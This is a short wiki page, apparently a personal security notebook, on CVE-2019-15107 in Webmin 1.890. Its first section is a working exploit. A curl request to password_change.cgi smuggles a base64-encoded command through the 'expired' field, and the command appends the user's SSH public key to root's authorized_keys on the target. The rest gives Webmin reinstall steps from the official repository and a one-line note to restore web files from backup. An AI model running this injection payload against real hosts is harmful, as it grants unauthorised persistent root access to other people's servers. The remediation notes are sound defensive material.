[ wiki.netzadresse.ch ]

Benutzer-Werkzeuge

Webseiten-Werkzeuge

Zuletzt angesehen: cve-2019-15107_webmin_1.890
security:exploit:cve-2019-15107_webmin_1.890

Inhaltsverzeichnis

Add ssh key to authorized keys on webmin host

COMMAND="echo '$(cat ~/.ssh/id_rsa.pub)' >> /root/.ssh/authorized_keys"
PAYLOAD="echo%20$(echo "$COMMAND" | base64 -w 0)|base64%20-d|sh"
curl -ks "http://<HOST>:10000/password_change.cgi" -d "user=root&pam=&expired=2;$PAYLOAD&old=foobar&new1=foobar1&new2=foobar1" -H "Referer: http://<HOST>:10000"

Patch/reinstall webmin

https://www.webmin.com/deb.html 

deb https://download.webmin.com/download/repository sarge contrib

wget https://download.webmin.com/jcameron-key.asc
apt-key add jcameron-key.asc

apt-get install apt-transport-https
apt-get update
apt-get install webmin

Restore

Restore /var/www/html/* from backup

security/exploit/cve-2019-15107_webmin_1.890.txt · Zuletzt geändert: von rsi
Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki